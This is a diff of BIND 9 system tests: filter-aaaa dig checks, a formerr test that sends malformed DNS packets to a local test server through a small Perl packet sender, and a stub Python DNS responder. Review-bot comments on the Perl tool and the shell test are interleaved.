+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl, recursive ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep ::6 dig.out.ns2.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY recursive ($n)"
+ret=0
+$DIG $DIGOPTS any dual.signed -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "1.0.0.3" dig.out.ns2.test$n > /dev/null || ret=1
+grep "::3" dig.out.ns2.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY recursive ($n)"
+ret=0
+$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "1.0.0.6" dig.out.ns2.test$n > /dev/null || ret=1
+grep "::6" dig.out.ns2.test$n > 
/dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, signed, qtype=ANY and DO is set, recursive ($n)"
+ret=0
+$DIG $DIGOPTS any dual.signed +dnssec -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1
+grep ::3 dig.out.ns2.test$n > /dev/null || ret=1
+grep "1.0.0.3" dig.out.ns2.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set, recursive ($n)"
+ret=0
+$DIG $DIGOPTS any dual.unsigned +dnssec -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "1.0.0.6" dig.out.ns2.test$n > /dev/null || ret=1
+grep "::6" dig.out.ns2.test$n > /dev/null && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl, recursive ($n)"
+ret=0
+$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep 1.0.0.6 dig.out.ns2.test$n > /dev/null || ret=1
+grep ::6 dig.out.ns2.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv4, recursive ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1
+grep 2001:db8::6 
dig.out.ns2.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is omitted from additional section, qtype=NS ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec ns unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep AAAA dig.out.ns2.test$n > /dev/null 2>&1 && ret=1
+grep "ADDITIONAL: 2" dig.out.ns2.test$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep "^mx.unsigned.*AAAA" dig.out.ns2.test$n > /dev/null 2>&1 && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is included in additional section, qtype=MX, signed ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec mx signed -b fd92:7065:b8e:ffff::2 @fd92:7065:b8e:ffff::2 > dig.out.ns2.test$n || ret=1
+grep "^mx.signed.*AAAA" dig.out.ns2.test$n > /dev/null 2>&1 || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv4 ($n)"
+ret=0
+$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.2 @10.53.0.2 > dig.out.ns2.test$n || ret=1
+grep "^mx.unsigned.*AAAA" dig.out.ns2.test$n > /dev/null 2>&1 || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+
+#
+# Recursive tests against:
+# filter-aaaa-on-v6 yes;
+# filter-aaaa { fd92:7065:b8e:ffff::3; };
+#
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when only AAAA record exists, signed, recursive with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa aaaa-only.signed -b 
fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null || ret=1
+grep ::2 dig.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that AAAA is returned when only AAAA record exists, unsigned, recursive with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa aaaa-only.unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1
+grep ::5 dig.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed, recursive with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.signed -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1
+grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned, recursive with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1
+grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1
+grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+n=`expr $n + 1`
+echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, signed and DO set, recursive with break-dnssec ($n)"
+ret=0
+$DIG $DIGOPTS aaaa dual.signed +dnssec -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1
+grep "ANSWER: 
0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NODATA/NOERROR is returned when both AAAA and A records exist, unsigned and DO set, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned +dnssec -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "ANSWER: 0" dig.out.ns3.test$n > /dev/null || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null && ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A records exist and query source does not match acl, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed and qtype=ANY with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns3.test$n > /dev/null || ret=1 +grep "::3" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned and qtype=ANY with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep 
"status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns3.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, signed, qtype=ANY and DO is set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.signed +dnssec -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "1.0.0.3" dig.out.ns3.test$n > /dev/null || ret=1 +grep ::3 dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that A and not AAAA is returned when both AAAA and A records exist, unsigned, qtype=ANY and DO is set with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned +dnssec -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "1.0.0.6" dig.out.ns3.test$n > /dev/null || ret=1 +grep "::6" dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that both A and AAAA are returned when both AAAA and A records exist, qtype=ANY and query source does not match acl, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS any dual.unsigned -b fd92:7065:b8e:ffff::1 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep 1.0.0.6 dig.out.ns3.test$n > /dev/null || ret=1 +grep ::6 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is returned when both AAAA and A record exists, unsigned over IPv4, recursive with break-dnssec 
($n)" +ret=0 +$DIG $DIGOPTS aaaa dual.unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep 2001:db8::6 dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=NS, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec ns unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep AAAA dig.out.ns3.test$n > /dev/null 2>&1 && ret=1 +grep "ADDITIONAL: 2" dig.out.ns3.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, unsigned, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns3.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is omitted from additional section, qtype=MX, signed, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx signed -b fd92:7065:b8e:ffff::3 @fd92:7065:b8e:ffff::3 > dig.out.ns3.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null || ret=1 +grep "^mx.signed.*AAAA" dig.out.ns3.test$n > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that AAAA is included in additional section, qtype=MX, unsigned, over IPv4, recursive with break-dnssec ($n)" +ret=0 +$DIG $DIGOPTS +add +dnssec mx unsigned -b 10.53.0.3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "^mx.unsigned.*AAAA" dig.out.ns3.test$n > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# We don't check for the AAAA record here as 
configuration in ns5 does +# not make sense. The AAAA record is wanted by filter-aaaa but discarded +# by the dns64 configuration. We just want to ensure the server stays +# running. +n=`expr $n + 1` +echo_i "checking filter-aaaa with dns64 ($n)" +ret=0 +$DIG $DIGOPTS aaaa aaaa-only.unsigned @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "status: NOERROR" dig.out.ns5.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/formerr/clean.sh b/bin/tests/system/formerr/clean.sh new file mode 100644 index 0000000..e525530 --- /dev/null +++ b/bin/tests/system/formerr/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f nametoolong.out +rm -f twoquestions.out +rm -f noquestions.out +rm -f ns*/named.conf +rm -f ns*/named.lock +rm -f ns*/named.run +rm -f ns*/named.memstats +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/formerr/formerr.pl b/bin/tests/system/formerr/formerr.pl new file mode 100644 index 0000000..0c68274 --- /dev/null +++ b/bin/tests/system/formerr/formerr.pl 
@@ -0,0 +1,97 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# This is a tool for sending an arbitrary packet via UDP or TCP to an +# arbitrary address and port. The packet is specified in a file or on +# the standard input, in the form of a series of bytes in hexadecimal. +# Whitespace is ignored, as is anything following a '#' symbol. +# +# For example, the following input would generate normal query for +# isc.org/NS/IN": +# +# # QID: +# 0c d8 +# # header: +# 01 00 00 01 00 00 00 00 00 00 +# # qname isc.org: +# 03 69 73 63 03 6f 72 67 00 +# # qtype NS: +# 00 02 +# # qclass IN: +# 00 01 +# +# Note that we do not wait for a response for the server. This is simply +# a way of injecting arbitrary packets to test server resposnes. +# +# Usage: packet.pl [-a <address>] [-p <port>] [-t (udp|tcp)] [filename] +# +# If not specified, address defaults to 127.0.0.1, port to 53, protocol +# to udp, and file to stdin. 
+# +# XXX: Doesn't support IPv6 yet + +require 5.006_001; + +use strict; +use Getopt::Std; +use IO::File; +use IO::Socket; + +sub usage { + print ("Usage: packet.pl [-a address] [-p port] [file]\n"); + exit 1; +} + +my %options={}; +getopts("a:p:", \%options); + +my $addr = "127.0.0.1"; +$addr = $options{a} if defined $options{a}; + +my $port = 53; +$port = $options{p} if defined $options{p}; + +my $file = "STDIN"; +if (@ARGV >= 1) { + my $filename = shift @ARGV; + open FH, "<$filename" or die "$filename: $!"; + $file = "FH"; +} + +my $input = ""; +while (defined(my $line = <$file>) ) { + chomp $line; + $line =~ s/#.*$//; + $input .= $line; +} + +$input =~ s/\s+//g; +my $data = pack("H*", $input); +my $len = length $data; + +my $output = unpack("H*", $data); +print ("sending: $output\n"); + +my $sock = IO::Socket::INET->new(PeerAddr => $addr, PeerPort => $port, + Proto => "tcp") or die "$!"; + +my $bytes; +$bytes = $sock->syswrite(pack("n", $len), 2); +$bytes = $sock->syswrite($data, $len); +$bytes = $sock->sysread($data, 2); +$len = unpack("n", $data); +$bytes = $sock->sysread($data, $len); +print "got: ", unpack("H*", $data). "\n"; + +$sock->close; +close $file; diff --git a/bin/tests/system/formerr/nametoolong b/bin/tests/system/formerr/nametoolong new file mode 100644 index 0000000..b81545f --- /dev/null +++ b/bin/tests/system/formerr/nametoolong 
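Review bot: The reply at the end of formerr.pl is read with two unchecked `sysread` calls, so a closed connection or a short TCP read leaves `$len` undefined or the payload truncated, and the script still prints a `got:` line. Check each return value, e.g. `defined($bytes) && $bytes == 2 or die "short read on length prefix\n";` after the first read, and loop until `$len` bytes have arrived for the second. The header comment also disagrees with the code: it advertises `-t (udp|tcp)` and says no response is awaited, while `getopts("a:p:", ...)` accepts only `-a`/`-p`, the socket is always `Proto => "tcp"`, and the reply is read and printed. Lastly, `my %options={};` should be `my %options = ();`, since assigning a hash reference to a hash stores one stringified-reference key.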
@@ -0,0 +1,19 @@ +00 00 00 00 00 01 00 00 00 00 00 00 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 +0e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 +00 01 +00 01 diff --git a/bin/tests/system/formerr/noquestions b/bin/tests/system/formerr/noquestions new file mode 100644 index 0000000..f087bcd --- /dev/null +++ b/bin/tests/system/formerr/noquestions @@ -0,0 +1 @@ +00 00 00 00 00 00 00 00 00 00 00 00 diff --git a/bin/tests/system/formerr/ns1/named.conf.in b/bin/tests/system/formerr/ns1/named.conf.in new file mode 100644 index 0000000..07aaf21 --- /dev/null +++ b/bin/tests/system/formerr/ns1/named.conf.in 
@@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/formerr/ns1/root.db b/bin/tests/system/formerr/ns1/root.db new file mode 100644 index 0000000..f4d4c69 --- /dev/null +++ b/bin/tests/system/formerr/ns1/root.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA marka.isc.org. a.root.servers.nil. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.4 diff --git a/bin/tests/system/formerr/setup.sh b/bin/tests/system/formerr/setup.sh new file mode 100644 index 0000000..e46affa --- /dev/null +++ b/bin/tests/system/formerr/setup.sh 
@@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/formerr/tests.sh b/bin/tests/system/formerr/tests.sh new file mode 100644 index 0000000..0e2bca4 --- /dev/null +++ b/bin/tests/system/formerr/tests.sh 
@@ -0,0 +1,47 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +echo_i "test name too long" +$PERL formerr.pl -a 10.53.0.1 -p ${PORT} nametoolong > nametoolong.out +ans=`grep got: nametoolong.out` +if [ "${ans}" != "got: 000080010000000000000000" ]; +then + echo_i "failed"; status=`expr $status + 1`; +fi + +echo_i "two questions" +$PERL formerr.pl -a 10.53.0.1 -p ${PORT} twoquestions > twoquestions.out +ans=`grep got: twoquestions.out` +if [ "${ans}" != "got: 000080010000000000000000" ]; +then + echo_i "failed"; status=`expr $status + 1`; +fi + +# this would be NOERROR if it included a COOKIE option, +# but is a FORMERR without one. +echo_i "empty question section (and no COOKIE option)" +$PERL formerr.pl -a 10.53.0.1 -p ${PORT} noquestions > noquestions.out +ans=`grep got: noquestions.out` +if [ "${ans}" != "got: 000080010000000000000000" ]; +then + echo_i "failed"; status=`expr $status + 1`; +fi + +echo_i "exit status: $status" + +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/formerr/twoquestions b/bin/tests/system/formerr/twoquestions new file mode 100644 index 0000000..2192e3d --- /dev/null +++ b/bin/tests/system/formerr/twoquestions @@ -0,0 +1,7 @@ +00 00 00 00 00 02 00 00 00 00 00 00 +0e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 +00 01 +00 02 +0e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 +00 01 +00 01 diff --git a/bin/tests/system/forward/ans11/ans.py b/bin/tests/system/forward/ans11/ans.py new file mode 100644 index 0000000..e8f1195 --- /dev/null +++ b/bin/tests/system/forward/ans11/ans.py 
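Review bot: The expected string `got: 000080010000000000000000` is repeated in all three checks of formerr/tests.sh without saying what it encodes, which makes a failure hard to interpret. A one-line comment above the first comparison would do, e.g. `# expected reply: ID 0, flags 0x8001 (QR set, RCODE 1 = FORMERR), all section counts 0`. The exit status of `$PERL formerr.pl` is not checked either; a crash of the sender is caught only indirectly because `grep got:` then leaves `ans` empty, so the log shows "failed" with no hint that the packet was never delivered.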
@@ -0,0 +1,143 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from __future__ import print_function +import os +import sys +import signal +import socket +import select +from datetime import datetime, timedelta +import time +import functools + +import dns, dns.message, dns.query, dns.flags +from dns.rdatatype import * +from dns.rdataclass import * +from dns.rcode import * +from dns.name import * + + +# Log query to file +def logquery(type, qname): + with open("qlog", "a") as f: + f.write("%s %s\n", type, qname) + + +############################################################################ +# Respond to a DNS query. +############################################################################ +def create_response(msg): + m = dns.message.from_wire(msg) + qname = m.question[0].name.to_text() + rrtype = m.question[0].rdtype + typename = dns.rdatatype.to_text(rrtype) + + with open("query.log", "a") as f: + f.write("%s %s\n" % (typename, qname)) + print("%s %s" % (typename, qname), end=" ") + + r = dns.message.make_response(m) + r.set_rcode(NOERROR) + if rrtype == A: + tld = qname.split(".")[-2] + "." + ns = "local." + tld + r.answer.append(dns.rrset.from_text(qname, 300, IN, A, "10.53.0.11")) + r.answer.append(dns.rrset.from_text(tld, 300, IN, NS, "local." + tld)) + r.additional.append(dns.rrset.from_text(ns, 300, IN, A, "10.53.0.11")) + elif rrtype == NS: + r.answer.append(dns.rrset.from_text(qname, 300, IN, NS, ".")) + elif rrtype == SOA: + r.answer.append(dns.rrset.from_text(qname, 300, IN, SOA, ". . 0 0 0 0 0")) + else: + r.authority.append(dns.rrset.from_text(qname, 300, IN, SOA, ". . 
0 0 0 0 0")) + r.flags |= dns.flags.AA + return r + + +def sigterm(signum, frame): + print("Shutting down now...") + os.remove("ans.pid") + running = False + sys.exit(0) + + +############################################################################ +# Main +# +# Set up responder and control channel, open the pid file, and start +# the main loop, listening for queries on the query channel or commands +# on the control channel and acting on them. +############################################################################ +ip4 = "10.53.0.11" +ip6 = "fd92:7065:b8e:ffff::11" + +try: + port = int(os.environ["PORT"]) +except: + port = 5300 + +query4_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_socket.bind((ip4, port)) +havev6 = True +try: + query6_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + try: + query6_socket.bind((ip6, port)) + except: + query6_socket.close() + havev6 = False +except: + havev6 = False +signal.signal(signal.SIGTERM, sigterm) + +f = open("ans.pid", "w") +pid = os.getpid() +print(pid, file=f) +f.close() + +running = True + +print("Listening on %s port %d" % (ip4, port)) +if havev6: + print("Listening on %s port %d" % (ip6, port)) +print("Ctrl-c to quit") + +if havev6: + input = [query4_socket, query6_socket] +else: + input = [query4_socket] + +while running: + try: + inputready, outputready, exceptready = select.select(input, [], []) + except select.error as e: + break + except socket.error as e: + break + except KeyboardInterrupt: + break + + for s in inputready: + if s == query4_socket or s == query6_socket: + print( + "Query received on %s" % (ip4 if s == query4_socket else ip6), end=" " + ) + # Handle incoming queries + msg = s.recvfrom(65535) + rsp = create_response(msg[0]) + if rsp: + print(dns.rcode.to_text(rsp.rcode())) + s.sendto(rsp.to_wire(), msg[1]) + else: + print("NO RESPONSE") + if not running: + break 
